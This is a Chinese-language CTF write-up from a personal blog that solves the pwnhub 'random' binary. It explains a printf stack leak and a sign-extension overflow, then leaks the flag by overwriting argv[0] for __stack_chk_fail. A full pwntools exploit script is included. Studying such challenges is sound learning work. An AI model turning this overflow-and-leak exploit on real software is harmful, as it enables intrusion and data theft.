roderick's blog
roderick's blog

pwnhub公开赛二期PWN-random

roderick roderick 收录于 pwn-wp
 约 1400 字 预计阅读 3 分钟  - 次阅读  
注意
本文最后更新于 2021-04-06,文中内容可能已过时。

random

总结

根据本题,学习与收获有:

  • 有时候IDA反编译出来的代码不一定准确,需要结合汇编代码进行分析
  • 之前的__stack_chk_fail函数,如果把args[0]处的地址覆盖为存储flag的地址,那么检测到canary被修改的时候,就会把flag打印出来

题目分析

checksec

https://image.roderickchan.cn/img/20210406231504.png

保护全开

函数分析

部分函数已重命名!

main

https://image.roderickchan.cn/img/20210406231657.png

main函数中,调用了初始化函数,还有prctl函数,以及读取用户输入,输出一段欢迎信息。

这里因为buf距离rsp0x20,如果完全读满0x10个字符,很可能会泄露出栈地址。

initial

https://image.roderickchan.cn/img/20210406231854.png

没啥好看的

set_prctl

https://image.roderickchan.cn/img/20210406231932.png

可以用seccomp-tools检测一下

https://image.roderickchan.cn/img/20210406232019.png

禁用了execve

vuln

https://image.roderickchan.cn/img/20210406232112.png

这个函数的处理流程为:

  • 读取flag到栈变量buf
  • 打印出了buf的低1个字节的地址
  • 读取一个正整数num
  • 读取用户输入,向栈变量v4里面读取(char)(num & 0x80)个字符
get_num

https://image.roderickchan.cn/img/20210406232739.png

读取一个正整数

read_input

https://image.roderickchan.cn/img/20210406234332.png

就是从stdin中读取输入,遇到\x0a结束。

漏洞点

漏洞点1:printf泄露出栈地址

main函数的分析中指出,如果输入name的时候,长度恰好为0x10个可打印字符,可能泄露出栈上的内容。可结合gdb调试看一下:

https://image.roderickchan.cn/img/20210406235713.png

的确能泄露出栈地址!

漏洞点2:任意大小往栈地址写内容

刚开始看IDA的反编译结果,看了半天,没有找到新的漏洞。后来研究了一下汇编代码,结合gdb调试,发现在read_input中,传给这个函数的第二个参数,也就是rsi寄存器的内容。

首先分析一下汇编代码:

https://image.roderickchan.cn/img/20210407000405.png

dword_20204c就是num & 0x80,接下来是一个movsxd指令,将32位寄存器进行符号扩展到64位寄存器。直接使用$rebase(0xC1F)断点打在read_input函数出,输入整数为0xffff

https://image.roderickchan.cn/img/20210407001226.png

此时的rsi寄存器存储的内容为0xffffffffffffff80,因此可以溢出写,大小基本不限!

利用思路

由于漏洞点只能泄露出栈地址,虽然有任意大小溢出漏洞,但是由于不知道程序的基地址,也不知道libc的基地址,所以无法使用ROP进行利用。但是考虑到程序本身读取了flag,且开启了canary保护,因此可以尝试利用stack smash打印出flag

知识点

  • stack smash

    开启了canary保护的程序,如果发现canary被修改,就会执行 __stack_chk_fail 函数来打印 argv[0] 指针所指向的字符串,正常情况下,这个指针指向了程序名。argv在很高的栈地址。

  • 如果可以不限制大小地进行栈溢出,可以修改argv[0]为指向flag的字符串地址,就能打印出flag

利用过程

利用步骤:

  • 利用printf打印出栈地址,结合gift地址,得到存储flag栈地址
  • 利用溢出漏洞,覆盖argv[0]flag地址,利用__stack_chk_fail打印出flag

EXP

调试过程

本地调试的时候,随便设置了一个flag文件:

首先需要读取出栈地址和计算出flag地址:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

io = process('./random')
io.sendafter("tell me your name\n", 0x10 * 'a')
msg = io.recvline()
leak_stack_addr = u64(msg[-7:-1] + b'\x00\x00' )
LOG_ADDR('leak_stack_addr', leak_stack_addr)
flag_addr = leak_stack_addr - 0x320
msg = io.recvline()
buf_low_addr = int(msg[5 : -1].decode(), base=16)
LOG_ADDR('buf_low_addr', buf_low_addr)
LOG_ADDR('flag_addr', flag_addr)

https://image.roderickchan.cn/img/20210407003700.png

接下来直接对栈进行溢出,触发stack smash

1
2
3

io.sendafter("leave something?\n", str(0xffff))
io.sendline(p64(flag_addr) * 0x200)
io.interactive()

https://image.roderickchan.cn/img/20210407003825.png

完整exp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

from pwn import *
LOG_ADDR = lambda x, y: log.success("{} ===> {}".format(x, hex(y)))

io = process('./random')
io.sendafter("tell me your name\n", 0x10 * 'a')
msg = io.recvline()
leak_stack_addr = u64(msg[-7:-1] + b'\x00\x00' )
LOG_ADDR('leak_stack_addr', leak_stack_addr)
flag_addr = leak_stack_addr - 0x320
msg = io.recvline()
buf_low_addr = int(msg[5 : -1].decode(), base=16)
LOG_ADDR('buf_low_addr', buf_low_addr)
LOG_ADDR('flag_addr', flag_addr)

io.sendafter("leave something?\n", str(0xffff))
io.sendline(p64(flag_addr) * 0x200)
io.interactive()

最后远程打的flag为:

https://image.roderickchan.cn/img/20210407004100.png

引用与参考

stack smash: https://ctf-wiki.org/pwn/linux/stackoverflow/fancy-rop/#stack-smash

更新于 2021-04-06 
CC BY-NC 4.0
pwn
返回 | 主页
Buy me a coffee~
roderick 支付宝支付宝
roderick 微信微信
0%